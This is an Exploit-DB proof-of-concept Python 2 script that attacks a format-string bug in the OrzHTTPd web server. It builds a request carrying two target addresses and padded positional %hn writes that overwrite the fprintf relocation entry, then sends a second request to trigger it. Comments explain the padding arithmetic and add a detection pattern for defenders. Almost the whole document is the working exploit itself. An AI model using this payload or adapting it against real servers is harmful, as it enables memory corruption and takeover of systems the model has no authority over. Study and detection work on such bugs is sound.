OrzHTTPd Format String Exploit
# Title: OrzHTTPd Format String Exploit
# EDB-ID: 10282
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Patroklos Argyroudis
# Published: 2009-12-03
# Verified: no
#!/usr/bin/env python
# orzex.py -- Patroklos Argyroudis, argp at domain census-labs.com
# http://code.google.com/p/orzhttpd/source/detail?r=141
#
# Proof-of-concept for a format-string bug in OrzHTTPd.  From the usage
# hint below ("objdump -R orzhttpd | grep fprintf") the server appears to
# hand request data to fprintf() as the format argument, so `%n`-style
# conversions in a request become memory writes.  The revision linked
# above is the upstream change this PoC references.
#
# This is Python 2 code (print statement, `except X, e`, urllib.urlopen);
# it does not run unmodified under Python 3.  `os` is imported but unused.
#
# Detection notes (defender side): the malicious request is a bare "GET "
# followed by eight raw bytes and then width-padded `%...x` and positional
# `%N$hn` conversions, with no HTTP version or headers.  A request line
# containing `%` immediately followed by digits, `$` and `hn` is never
# legitimate HTTP; logging or an IDS rule on that pattern flags this class
# of input, and a server that never uses client data as a format string is
# not affected.

import os
import sys
import socket
import struct
import time
import urllib

# Request prefix.  Its length matters: every byte emitted before the %hn
# conversions counts toward the value they store.  The same prefix is also
# sent on its own as the "trigger" request.
GET = "GET "


def main(argv):
    """Send the format-string request, then a second request to trigger it.

    argv[1] is the host, argv[2] the TCP port, argv[3] the hex address of
    the fprintf relocation entry (per the objdump -R hint below).  Exits 0
    on a usage error and 1 if the target does not answer a plain HTTP
    fetch; otherwise falls through after the two sends.
    """
    argc = len(argv)
    if argc != 4:
        print "usage: %s <host> <port> <address>" % (argv[0])
        print "[*] find address with objdump -R orzhttpd | grep fprintf"
        sys.exit(0)

    host = argv[1]
    port = int(argv[2])
    addr = int(argv[3], 16)

    print "[*] target: %s:%d:%s" % (host, port, argv[3])

    # Reachability check only; the response body is discarded.
    try:
        sd = urllib.urlopen("http://%s:%d" % (host, port))
        sd.close()
    except IOError, errmsg:
        print "[*] error: %s" % (errmsg)
        sys.exit(1)

    time.sleep(1)

    # The string opens with two little-endian 32-bit values (addr + 2, then
    # addr); they are the destinations of the two %hn half-word writes that
    # follow.  "%.16650x" and "%.514x" pad the output so the running
    # character count is what each %hn stores; "%19$" and "%20$" pick the
    # positional printf argument holding each destination.  The exact
    # counts are tied to this server build and the "GET " prefix length.
    fmtstr = struct.pack('<LL', addr + 2, addr)
    fmtstr += "%.16650x%19$hn%.514x%20$hn"

    payload = GET
    payload += fmtstr

    print "[*] sending exploit format string to %s:%d" % (host, port)

    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    sd.send(payload)
    sd.close()

    # Second, ordinary request.  Presumably it makes the server call the
    # function whose relocation entry was overwritten -- the server side is
    # not shown here, so treat that as inferred.
    print "[*] sending trigger to %s:%d" % (host, port)

    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    sd.send(GET)
    sd.close()


if __name__ == "__main__":
    main(sys.argv)
    sys.exit(0)

# EOF